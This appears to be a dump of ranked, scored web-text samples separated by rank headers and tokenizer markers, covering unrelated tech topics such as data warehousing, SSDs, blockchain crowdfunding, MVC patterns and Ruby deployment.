URL. Also, because PWAs tend to be much smaller than the average native app, your app will not be taking up much of the precious storage on a user’s device. - -How to get started today - -The first concern I normally hear from devs interested in building a PWA is that Safari, the preinstalled browser on Apple devices, does not have support for PWAs. To be frank, this actually doesn’t matter because of progressive enhancement. With a few extra lines of code you can assure that users on browsers that do support those API’s get the full experience, and users on safari still get a great,fast experience. Also, Webkit, the browser engine behind Safari, recently announced they were implementing service workers, a key api for PWAs, so these API’s are going to be coming to Safari soon anyway. - -Ionic fully supports PWAs out of the box. Our starters provide the minimum things -================================================================================ -Rank = 11; Score = 7208960.0 -<|begin_of_text|>Data Warehousing at Wayfair - -In 2009 Wayfair’s database infrastructure was based almost entirely on Microsoft SQL Server. Our Business Intelligence team was using a SQL Server data warehouse to prepare a large amount of data for import into Analysis Services (SSAS) each day. We populated our data warehouse using transaction log shipping from production servers, which required about 3 hours of downtime on the data warehouse at midnight each night to restore the previous day’s logs. Once that was done, a series of stored procedures were kicked off by jobs that would crunch through data from several different servers to produce a star schema that could be pulled into SSAS. Wayfair was scaling rapidly, and this approach started to become painfully slow, often taking 10-16 hours to crunch through the previous day’s data. - -The BI team decided to look into other solutions for data warehousing, and ultimately purchased a Netezza appliance. Netezza is essentially a fork of PostgreSQL that takes a massively parallel cluster of nodes (24 in our case) and makes them look like one database server to the client. In our tests, Netezza could crunch through our data in roughly a quarter of the time, bringing 10-16 hours down to a much more reasonable 2-4 hours. The dream of updating our data warehouse multiple times each day was starting to look feasible. The feedback loop on business decisions would become dramatically shorter, enabling us to iterate more quickly and make well informed decisions at a much faster pace. There was just one glaring problem. - -Great, But How Are We Going to Get Data Into It? - -As soon as the DBA team heard that the Netezza purchase had been finalized, our first question was “great, but how are we going to get data into it?” The folks at Netezza didn’t have an answer for us, but they did send us an engineer to help devise a solution. As it turned out, the problem of how to incrementally replicate large amounts of data into a data warehouse was a common one, and there were surprisingly few open source solutions. Google it, and most people will tell you that they just reload all their data every day, or that they only have inserts so they can just load the new rows each day. “Great, but what if you want incremental replication throughout the day? What if you have updates or deletes? How do you deal with schema changes?” Crickets. - -The First Solution - -The solution we arrived upon was to use SQL Server Change Tracking to keep track of which rows had -================================================================================ -Rank = 12; Score = 6586368.0 -<|begin_of_text|>More Info - -Windows 10 - -Microsoft Windows 10 combines the best elements of the Windows you already know, like the Start menu, with new features like space to pin your favorite apps and easy navigation so you'll feel right at home. Getting set up is faster and easier so you can get right to work or exploring the Windows App Store games or a new version of Office. InstantGo quickly boots up or resumes Windows while enhancements help balance memory and processor resources for maximum efficiency and Battery Saver automatically conserves power. Windows 10 also offers more built-in security features improving protection against viruses, phishing, and malware. - -Solid State Drive - -More reliable and significantly faster than traditional spinning-platter hardrives, solid state drives work more like a large flash drive giving you quick access to your data. With no moving parts generating heat, solid state drives use less power and keep your system cooler which helps reduce component failure. Light weight and durable, solid state drives are often found in portable devices since they are less prone to travel damage and accidents like being dropped. - -1TB Hard Drive - -A terabyte equals one trillion bytes. To put that in perspective, that's room enough for about 250,000 MP3 files, or according to Ron White, in his book, "How Computers Work", 20,000 four-drawer filing cabinets filled with text. In addition, this hard drive operates at a variable RPM which means you've got the best of both worlds, full speed for demanding loads and energy conservation during minimal access. - -Smart Cache - -With Intel Smart Cache you benefit from increased data access because the cache is shared between the cores from a single access point and optimized by workload demand. That means your system is making maximum use of its resources, enhancing multi-threading, and reducing storage redundancy. - -Intel® Quick Sync Video - -Built into every 2nd generation Intel Core™ processor, Quick Sync Video enables users to quickly create, edit, synchronize, and share video files from home or make them available online without the need for extra hardware. In addition, media conversion between devices takes just minutes thanks to hardware acceleration streamlining this process at incredible speed. That includes creating DVDs, Blu-ray™ discs, or editing and converting HD videos for portable media devices or uploading to your favorite social media sites. - -Intel InTrue™ 3D Technology - -The perfect way to watch 3D movies. InTrue 3D technology delivers 1080p, hi-def resolution 3D action to your TV using HDMI 1.4. With Blu -================================================================================ -Rank = 13; Score = 6520832.0 -<|begin_of_text|>In the last few years, sites like Kickstarter and Indiegogo have revolutionized the world for startups. Ideas that didn't have mainstream business appeal were not only getting off the ground, but flourishing. Blockchain crowdfunding might just be the next step in startup evolution, helping important and interesting projects come to fruition. - -Crowdfunding provides an excellent way for creative projects to find cash. Many small or obscure projects lay outside of the scope of traditional investment. This makes it very difficult for them to get their ideas off the ground. Kickstarter, Indiegogo, and others changed that, by allowing startups to connect directly with potential consumers in order to seek funding. They acted as a trusted third party to keep the money in escrow, helping to protect potential investors from being scammed. If the funding succeeds, customers get whatever was promised to them as part of the campaign. If not, their money will be sent back. - -Blockchain Meets Kickstarter: Is This The Future? - -The problem with these established crowdfunding companies is that they are centralized bodies, charging high fees and also influencing the projects. Blockchain-based crowdfunding is set to be a game changer because it decentralizes the funding model from the likes of Kickstarter and other companies. - -Kickstarter provides a service and there are costs to run that service, so it's hard to blame them for charging 5% of the total funds received, with an additional 3-5% going towards payment processing. Despite this, it is still expensive. With blockchain's distributed ledger, there is the potential to remove this third party, which will save a considerable amount of the fundraising costs. - -Blockchain crowdfunding works by allowing startups to create their own digital currencies and sell them. This allows them to raise funds from early investors, while the investors also have the potential to make money if the value of their cryptographic shares increases. - -Some advocates consider this a more pure form of crowdfunding, because it removes any intermediaries standing between the backers and the startup. It also has the potential to boost new blockchain platforms, because it will give the blockchain community a new way to fund its own projects. It appeals to the more anarchistic blockchain enthusiasts as well, because it allows them to avoid traditional funding methods. - -How Does Blockchain Crowdfunding Work? - -It is similar to Kickstarter, with the creators posting their project and then soliciting funds from a community of interested people. Where it differs is that the startups will be able to make their own cryptocurrency to sell to potential backers. These cryptocurrency tokens will be accounted for and kept track of by the blockchain, which makes it immutable -================================================================================ -Rank = 14; Score = 6356992.0 -<|begin_of_text|>About - -Sayid Pro Brings Transparency to the Production Environment - -Sayid Pro is a tool for debugging and profiling Clojure in a production environment. We all want more visibility into what is happening in our production servers. When something is going wrong, we want precise answers. Sayid Pro aims to give you that. - -Sayid Pro works by tracing functions. When a traced function is executed, it's arguments and return value are captured by Sayid Pro. Sayid Pro provides a web interface through which you can remotely activate tracing on any functions, on any of your servers (that have Sayid Pro embedded in them). The Sayid Pro web application also allows users to query and visualize the captured trace data. - -You can also watch a hi-res version of the video here: https://youtu.be/y5ll-6IjJGw - -Architecture - -Library - The Sayid Pro Library is included in your production servers. It handles data capture and transmission. - -Hub - The Sayid Pro Hub runs in your infrastructure. It communicates with servers running the Sayid Pro library and receives trace data from them. Trace data is written to a PostgreSQL database as it is received. The hub also hosts the web app. - -Database - All captured trace data is stored in a PostgreSQL database. - -Web App - The web app is hosted by the Sayid Pro Hub. This is the interface that allows you to toggle tracing and then query and visualize captured trace data. - -Web App UI - -The web application is a critical piece of the product. I hope the prototype, while still immature, demonstrates the potential of Sayid Pro as a tool for solving production problems. Below is a description of the major UI components as they currently exist. - -Query Editor - -This is where it all starts. The query editor is for composing and executing queries and commands. These are sent off to the Sayid Pro Hub for execution. Some commands, such as enabling or disabling tracing, are forwarded on to servers. Servers can be selected individually, or in groups by a class tag. - -Trace data can be queried by different fields, such as end time or function name. Trace data is rendered into interactive visualization in the tree, table and chart UI components. Those are described below. - -Tree - -The tree UI component represents the trace data in a way that reflects its original call hierarchy. Each instance of a function call is a node. These nodes show the name of the function. The tree will also display the arguments and return value of a trace instance when the node is clicked. - -Table - -The table -================================================================================ -Rank = 15; Score = 6324224.0 -<|begin_of_text|>For the RAC release, here’s some of the metadata that was automatically generated using a system we developed called Constellate (that will become the foundational layer of our upcoming creator’s portal): - -Along with content-addressing, this layer then becomes the starting point for licensing a work. - -COALA IP forms part of the CBOR IPLD specification that will allow us to in the future traverse this graph from metadata object right into Ethereum and other merkle data structures. The website includes access to the open source implementations. - -With that, a group was formed in October 2015 to work such a standard. Ujo, BigchainDB, IPFS, Swarm, Jaak and many others collaborated over the course of the past year and half to establish such a standard. We didn’t reinvent the wheel and adapted existing standards to be more blockchain friendly, including hash linking that we’ve come to know and love: creating COALA IP. - -One of the key issues for a machine-readable licensing system: is to have a standard that’s easily readable and digestible. This makes it easier for developers to license works for their applications.The Tiny Human Ethereum Smart Contract had rights information in it, but it was embedded in an Ethereum smart contract. Besides having to run a full Ethereum node to get access to the data, there was also no standard API to interface with it back then. We also have to consider a substantially more long-term future, where it could be possible that specific blockchain implementations can morph and change over time. A key design consideration was splitting of the data (rights owners, from the business logic: paying, rights transfers, etc). The data can then be referenced by any current or future blockchain. - -On May 22nd, RAC announced that he wanted to release his album on the Ethereum network. We saw it as a good chance to demonstrate the potential of our architecture with him. In this collaboration, we are about 75% of the way towards finalising the different parts of this infrastructure. In this initial iteration, we had to manually craft the various components of the system, but also structured it in a modular and reusable way. In the future, with the introduction of our creator’s portal, we aim to automate this, and provide access to all artists. - -We’ve devised a system that improves the way current licensing is handled, but also opens up a large new scope for innovative and flexible licensing schemes. We saw glimpses of this when we launched the Tiny Human prototype with Imogen Heap in October 2015: a smart contract -================================================================================ -Rank = 16; Score = 6193152.0 -<|begin_of_text|>It’s not difficult to read and listen about the wonders of Embarcadero DataSnap technology around the world. I attended the Delphi Conference 2011 and 2012 in Sao Paulo, Brazil, after the release of versions of Delphi XE2 and XE3, and the words “performance” and “stability” are not spared when the subject is DataSnap. Apparently a perfect solution for companies that have invested their lives in Delphi and now need to reinvent themselves and offer web and mobile services. But does DataSnap really work on critical conditions? - -I found some references from other people talking about it on StackOverflow: - -The company I work for stands as one of the five largest in Brazil when it comes to software for supermarkets. The main product is a considerably large ERP developed in Delphi (for over ten years). Recently we initiated a study to evaluate technologies that would allow us to migrate from client / server to n-tier application model. The main need was to be able to use the same business logic implemented on a centralized location on different applications. - -The most obvious option is the DataSnap, which works very similarly to what is found in legacy applications. It can drag components, using dbExpress, for example. - -We tested the DataSnap technology in order to know what level of performance and stability it provides and to verify if it really meets our requirements. Our main requirement was the server’s ability to manage many simultaneous connections, since the application is big and used by many users. - -Objective - -Our objective was to test the DataSnap REST API and to answer some questions: - -How does it behave in an environment with many concurrent connections? - -What is the performance in a critical condition? - -Is it stable in critical condition? - -Methodology - -The tests are based on a lightweight REST method without any processing or memory allocation, returning only the text “Hello World”. The DataSnap server was created using the Delphi XE3 wizard and implemented the HelloWorld method. The testing was performed on all types of lifecycles (Invokation, Server and Session) and also with VCL and Console application. However, as the results were identical, the presented data is only based on the results obtained using the console version with “Server” lifecycle only. - -We decided to create a few servers based on other technologies, not necessarily similar or with the same purpose, just to have a basis for comparison. Servers have been created using the following frameworks: - -mORMot (Delphi) - -ASP.NET WCF - -Jersey/Grizzly (Java -================================================================================ -Rank = 17; Score = 6127616.0 -<|begin_of_text|>Take virtually any modern day SSD and measure how long it takes to launch a single application. You’ll usually notice a big advantage over a hard drive, but you’ll rarely find a difference between two different SSDs. Present day desktop usage models aren’t able to stress the performance high end SSDs are able to deliver. What differentiates one drive from another is really performance in heavy multitasking scenarios or short bursts of heavy IO. Eventually this will change as the SSD install base increases and developers can use the additional IO performance to enable new applications. - -In the enterprise market however, the workload is already there. The faster the SSD, the more users you can throw at a single server or SAN. There are effectively no limits to the IO performance needed in the high end workstation and server markets. - -These markets are used to throwing tens if not hundreds of physical disks at a problem. Even our upcoming server upgrade uses no less than fifty two SSDs across our entire network, and we’re small beans in the grand scheme of things. - -The appetite for performance is so great that many enterprise customers are finding the limits of SATA unacceptable. While we’re transitioning to 6Gbps SATA/SAS, for many enterprise workloads that’s not enough. Answering the call many manufacturers have designed PCIe based SSDs that do away with SATA as a final drive interface. The designs can be as simple as a bunch of SATA based devices paired with a PCIe RAID controller on a single card, to native PCIe controllers. - -The OCZ RevoDrive, two SF-1200 controllers in RAID on a PCIe card - -OCZ has been toying in this market for a while. The zDrive took four Indilinx controllers and put them behind a RAID controller on a PCIe card. The more recent RevoDrive took two SandForce controllers and did the same. The RevoDrive 2 doubles the controller count to four. - -Earlier this year OCZ announced its intention to bring a new high speed SSD interface to the market. Frustrated with the slow progress of SATA interface speeds, OCZ wanted to introduce an interface that would allow greater performance scaling today. Dubbed the High Speed Data Link (HSDL), OCZ’s new interface delivers 2 - 4GB/s (that’s right, gigabytes) of aggregate bandwidth to a single SSD. It’s an absolutely absurd amount of bandwidth, definitely more than a single controller can feed today - which is why the first SSD to support it will be a multi-controller device with internal RAID. - -Instead of relying on -================================================================================ -Rank = 18; Score = 6029312.0 -<|begin_of_text|>Working in a global retail environment poses some interesting availability challenges when you have physical Bricks and Mortar stores. I have been thinking about the problem of high availability in this environment for a little while now due to a project I am involved with to harmonise the retail systems used between global groups. It is quite a common problem for an organisation that has grown through acquisition that you have different systems used in different business units, but after a while it makes sense to try and go with a common platform. - -This article talks about how this architecture could look and how you can support the staggered roll-out of new Point of Sale features to the store whilst still maintaining high availability. - -Logical View - -Before I talk about the architecture, I want to cover a scenario first of the end state. Imagine there is a global retail company based in both North America and Europe. Both territories have around 1000 physical bricks and mortar stores. These stores each have a number of tills (cash registers for my American friends). There could be between 2 and 5 tills per store depending on its size. Each till communicates with systems hosted at a centralised location. These systems consist of web services, caching servers and databases. This has been illustrated in the diagram below. - -This diagram shows 2 geographic regions. Each Region contains a head office network infrastructure and a store network infrastructure. Both of the global regions are completely separate from each other. There are no shared resources between the two. - -A requirement for this architecture is that it be highly available. The stores should always have access to the services. The easiest thing to do is to put a load balancer in front of the web services and have multiple app servers. Then if any app server should go down or exhibit problems, the other load balancers can pick up the slack. - -Physical Architecture - -Although the App Servers described are load balanced and provide a degree of availability, if there is a problem/outage with the data centre where they are hosted, then you have a problem as no matter how many load balanced App Servers you have, if connectivity goes to the data centre then your retail stores are cut off from working. The way around this is to have co-location facilities in each region. This is shown in the diagram below. - -Each global region has 2 locations. There are 2 ways you can run this configuration. - -Active – Active: This is where you run both locations at the same time and load balance between the 2 of them. If one location goes down the other location picks up the traffic. - - -================================================================================ -Rank = 19; Score = 5963776.0 -<|begin_of_text|>Deploying a Ruby app with Passenger to production - -Passenger is an open source web application server for Ruby. It handles HTTP requests, manages processes and resources, and enables administration, monitoring and problem diagnosis. Passenger is very easy to use, makes deploying in production much easier and is scalable. - -What is this tutorial? - -This is an end-to-end tutorial that teaches you how to install Ruby and Passenger on a production server. This tutorial will ask you some questions, so the exact tutorial steps depend on the choices you make. In general, it covers these topics: - -Launching a server Installing the Ruby runtime Installing Passenger Setting up the production server in preparation for the application, such as creating a Unix user account and setting up permissions Deploying the application itself Updating the application to newer versions Optional integration with a web server, such as Nginx or Apache - -Not familar with Passenger? Please take a look at the quickstart and the basics tutorial. Developing? Looking to run Passenger in development? Then please read the basics tutorial or the development guide. Advanced user? Simply skip the steps that you are already familiar with, or refer to our installation guides which are not end-to-end, but are shorter and more focused. - -Ready to get started? - -Please start by picking the hosting provider or infrastructure that you want to deploy to.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 20; Score = 5963776.0 -<|begin_of_text|>Yesterday I read this article, from Derek Sivers’ blog. I encourage you to read it as well, but here’s the summary: - -We should move logic more into the database, because “Classes, models, and methods (OOP) are an unnecessary complication.” - -Data structure doesn’t change often, but code (logic) does. So let’s move the logic closer to the data structure - -“PL/pgSQL is not the most beautiful language, but the simplicity of having everything in the database is worth it.” - -We can do that by using triggers, stored procedures and the likes. We then call them directly from the application layer (there follows an example of a REST api in sinatra). - -First I thought it was a long winded joke, but the article was over before the expected “haha jk”. I actually had to scroll down quite a bit to find the first dubious commenter. - -Now, let’s clarify one thing: his approach makes sense – under very specific conditions. Those conditions loosely being that the application is mostly data centric (data in, data out, CRUD and a little validation), and most of the work is related to how data is presented. - -Fact is, we have already the perfect solution for this scenario, and we have had it for years: it’s called Microsoft Access. - -So, why aren’t all applications out there written in MS Access, or one of its clones? - -Enter: design space - -So, what is the problem with having all the logic in the database? - -Anyone who’s actually worked on a big application, with hundreds of triggers and stored procedures, knows perfectly what the problem is. It might be slightly more difficult to articulate it in clear words – I myself could not place a finger on the definition for a long time. - -When you decide to store all logic in the database, you have made the decision to fight in a very tight space. Everytime something unexpected pops up, you have to work it out inside the very cramped code room you’ve created for yourself. - -The advantage is that everything is in reach – add, delete, change a trigger here and a stored procedure there, you can alter a great deal of things with very little code. - -The disadvantage is that you’re effectively coding yourself into a corner. Moving is impossible except by making very complicated contorsions. Everytime you do, you’re at risk of breaking something you didn’t want to touch at all. Side effects galore. - -And, the more you do this, the more space you’re taking away from yourself – -================================================================================ -Rank = 21; Score = 5636096.0 -<|begin_of_text|>Pixode, a company that started in 2010 making mobile games, just announced Tuesday the launch of what it describes as a “Crypto 2.0” platform in Open Assets and a colored coins wallet called Coinprism - -“Colored coins are about taking a fraction of a Bitcoin, and tagging it with a secondary, user-defined value,” founder Flavien Charlon said in a release. “That value can then be stored on the block chain, and transferred simply by transferring the underlying bitcoins. - -“This opens a wide range of possibilities. An interesting use case is the ability for a company to issue shares in the form of colored coins, which can then be traded in a purely decentralized way on the Bitcoin block chain. This allows companies to run IPOs on the block chain in minutes, and for the price of a Bitcoin transaction.” - -The Open Assets platform could also be applied to smart contracts or precious metals, he said. - -Coinprism is one application of Open Assets, a wallet for storing, sending and receiving colored coins. wallet. “Coinprism has a strong focus on security, and private keys are always encrypted on the client before being transmitted to the server,” Charlon said. - -Pixode last year also released Predictious, a predictions and derivatives market. - -We reached out to Charlon recently to get some details about the projects. - -Cointelegraph: What are some other applications you imagine for Coinprism? - -Flavien Charlon: Bitcoin exchanges could decide to allow people to withdraw and deposit so-called “USD coins.” Those "USD coins" would be each worth one dollar, redeemable at that exchange. People can then start using that as a payment worth exactly one dollar, so they are not exposed to the volatility of Bitcoin while still getting all the benefits of a decentralized network. This can also allow people to do arbitrage between exchanges without even having to go through the traditional banking system. - -As a second example, colored coins can be used as a way to do decentralized and truly anonymous voting. A company like Coca-Cola could distribute "vote coins" by putting a private key on each bottle of Coke they sell, each with one "vote coin." Then at some point, when trying to decide what new product to put to market, they can ask their customers to send their vote coins to either one address if they want the new flavor to be X or to a different address if they prefer the new flavor to be Y. They can then simply count the number of "vote coins" on each address to know -================================================================================ -Rank = 22; Score = 5537792.0 -<|begin_of_text|>Last week, I wrote A Beginner’s Guide To MVC For The Web. In it, I described some of the problems with both the MVC pattern and the conceptual “MVC” that frameworks use. But what I didn’t do is describe better ways. I didn’t describe any of the alternatives. So let’s do that. Let’s talk about some of the alternatives to MVC… - -Problems With MVC - -Let’s restate the fundamental problems we talked about that exist with MVC: - -MVC Is Stateful It only makes sense if the View, as well as the View-Model binding is stateful (so the Model can update the View when it changes) MVC Has No Single Interpretation Every framework uses their own nuanced version. How Does Logging Fit In? Where does application code that’s not clearly data-centric belong in the application? Siblings To MVC - -There are a whole bunch of siblings to MVC that take slight divergences and have narrow differences. Let’s briefly talk about a few of them: - -This is quite similar to the MVC pattern, except that you can nest the triads together. So you can have one MVC structure for a page, one for navigation and a separate one for the content on the page. So the “top level” dispatches requests down to navigation and content MVC triads. - -This makes structuring complex pages easier, since it allows you to create reusable widgets. But it brings all of the problems that MVC has, and solves none of them (it just adds complexity on top). - -So HMVC doesn’t really solve our problems… - -The difference between MVC and MVVM is a lot more subtle. The basic premise is that in normal MVC, it’s bad that the View is doing two jobs: presentation and presentation data logic. Meaning that there’s a difference between actual rendering, and dealing with the data that will be rendered. So MVVM splits the MVC View in half. The presentation (rendering) happens in the View. But the data component lives in the ViewModel. - -The ViewModel can interact with the rest of the program, and the View is bound to the ViewModel. This means that there’s more of a separation between presentation and the application code that lives in the Model. - -The controller isn’t mentioned, but it’s still in there somewhere. - -Again, this solves some types of problems with MVC, but doesn’t address any of our issues. - -MVP is a bit different from MVC in implementation. Instead of having the Controller intercept user interaction and the View render data, MVP structures itself a bit differently -================================================================================ -Rank = 23; Score = 5373952.0 -<|begin_of_text|>[Haskell-cafe] ANNOUNCE: wai-0.0.0 (Web Application Interface) - -Hello all, I'd like to announce the first release of the Web Application Interface package[1]. The WAI is a common protocol between web server backends and web applications, allowing application writers to target a single interface and have their code run on multiple server types. There are two previous implementations of the same idea: the Network.Wai module as implemented in the Hyena package, and Hack. Some distinguishing characteristics of the wai package include: * Unlike Hack, this does not rely upon lazy I/O for passing request and response bodies within constrained memory. * Unlike Hyena, the request body is passed via a "Source" instead of Enumerator, so that it can easily be converted to a lazy bytestring for those who wish. * Unlike both, it attempts to achieve more type safety by have explicit types of request headers, response headers, HTTP version and status code. * It also removes any variables which are not universal to all web server backends. For example, scriptName has been removed, since it has no meaning for standalone servers. This package also contains separate modules for conversions to and from Sources and Enumerators. I am also simultaneously releasing two other packages: web-encodings 0.2.4[2] includes a new function, parseRequestBody, which directly parses a request body in a WAI request. It handles both URL-encoded and multipart data, and can store file contents in a file instead of memory. This should allow dealing with large file submits in a memory-efficient manner. You can also receive the file contents as a lazy bytestring. Finally, wai-extra 0.0.0 [3] is a collection of middleware and backends I use regularly in web application development. On the middleware side, there are five modules, including GZIP encoding and storing session data in an encrypted cookie (ClientSession). On the backend side, it includes CGI and SimpleServer. The latter is especially useful for testing web applications, though some people have reported using it in a production environment. All of the code is directly ported from previous packages I had written against Hack, so they are fairly well tested. As far as stability, I don't expect the interface to change too drastically in the future. I am happy to hear any suggestions people have for moving forward, but expect future versions to be mostly backwards compatible with this release. Also, future versions will respect the Package Versioning Policy -================================================================================ -Rank = 24; Score = 5341184.0 -<|begin_of_text|>Revolut, a financial technology start-up, has started to use IBAN format for account numbers that can be used by financial institutions to credit funds into the beneficiary’s account in 42 European countries, announced company. - -Lithuanian IBAN account numbers will be assigned to Revolut customers so that they will have a euro account number in any country in Europe. - -All payments executed by traditional banks, including salaries, can now be made into Revolut customers’ accounts with IBAN format. In addition, this functionality will allow customers to withdraw cash from PayPal, Lydia or P2P accounts. A euro account can be opened in less than one minute on a smartphone using the Revolut application. - -This financial technology start-up, known in some quarters as the “hooligan of banking”, has already attracted investment worth USD 66 million and has more than 700,000 users. - -The central bank of Lithuania, Lietuvos bankas, has made an unprecedented promise to FinTech companies by announcing it will provide preliminary answers to financial institution licence enquiries within one week, the fastest turnaround in the EU. - -The programme will apply to companies that are already licensed in another EU country and want to move their place of residence to Lithuania. Full authorisation will be issued in two to six months later (depending on the type of licence). - -The Bank of Lithuania also recently launched the programme Newcomer, which aims to facilitate FinTech companies setting up in Lithuania by providing consultations and guiding companies throughout the licensing procedures. Companies can apply with their requests to Newcomer@lb.lt and expect an answer within two to three working days. - -A range of other advantages are on offer to FinTech companies choosing to set up in Lithuania. Payment and electronic money institutions in Lithuania can access the Single Euro Payment Area (SEPA) through the infrastructure of the Bank of Lithuania, enabling them to reduce their dependence on banking competitors and offer a wider range of payment services. - -Moreover, the Bank of Lithuania allocates a code to providers of payment services that is used to generate accounts in IBAN format no later than the following business day.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 25; Score = 5308416.0 -<|begin_of_text|>The fundamental goal of typography is to make text easy and enjoyable to read. Typography has its own set of rules and guidelines. From there, we bend the rules to prioritize how to make the text easier to read. - -Treating text as an interface is as much about usability as it is enjoyment and ease. It is the writer’s responsibility to make content compelling and interesting and the typography’s responsibility to make the act of reading feel effortless and enjoyable. - -Our blog’s interface is text. The goals of that interface are to: - -reduce mental effort when reading and deciding what to read. - -simplify the information on screen to increase its usability. - -re-use patterns to minimize learning. - -provide feedback to the user to give them confidence in their actions. - -create an enjoyable experience. - -In The Elements of Typographic Style, Robert Bringhurst describes typography as a system based on “the structure and scale of the human body,” particularly the eye, hand, forearm, and of course, the mind. - -Just as Bringhurst applies the idea of designing with human behavior and physical attributes in mind, we see that practice equally applied in software and hardware design. Typography should take a form that is natural and beneficial for people to interact with. - -After making some updates to our blog, it was interesting to see that many of the considerations made in typographic changes are similar to the considerations we make when designing software. - -Here’s a screenshot of the updated designs: - -The changes we’ve made are centered around one of the jobs-to-be-done by the blog, which is to provide interesting information to the reader. Because of this, one of our goals is to present concise information in a way that allows the reader to make quick and informed assessments of what they’d like to read. - -The header elements (our logo and the blog title) have been grouped to stand out from the list of articles. This makes the page easier to scan for content. The title of an article is now emphasized over the date to present the most important information first. This also allows the link to get to the article to be front and center. - -To help the reader create accurate groupings of information, we increased the white space around each article listing and added simple borders to enclose the information related to each article. This prevents the information from bleeding together and causing confusion. - -To the individual articles, we decreased the line length of the paragraphs and added more distinct styles to the heading tags to emphasize hierarchy. - -Using line length as an example, let’s look more closely at the the impact of typography on user experience. Bringhurst advises that -================================================================================ -Rank = 26; Score = 5242880.0 -<|begin_of_text|>[This post is by Romain Guy and Chet Haase, Android engineers who have been known to collaborate on the subject of graphics, UIs, and animation. You can read more from them on their blogs at 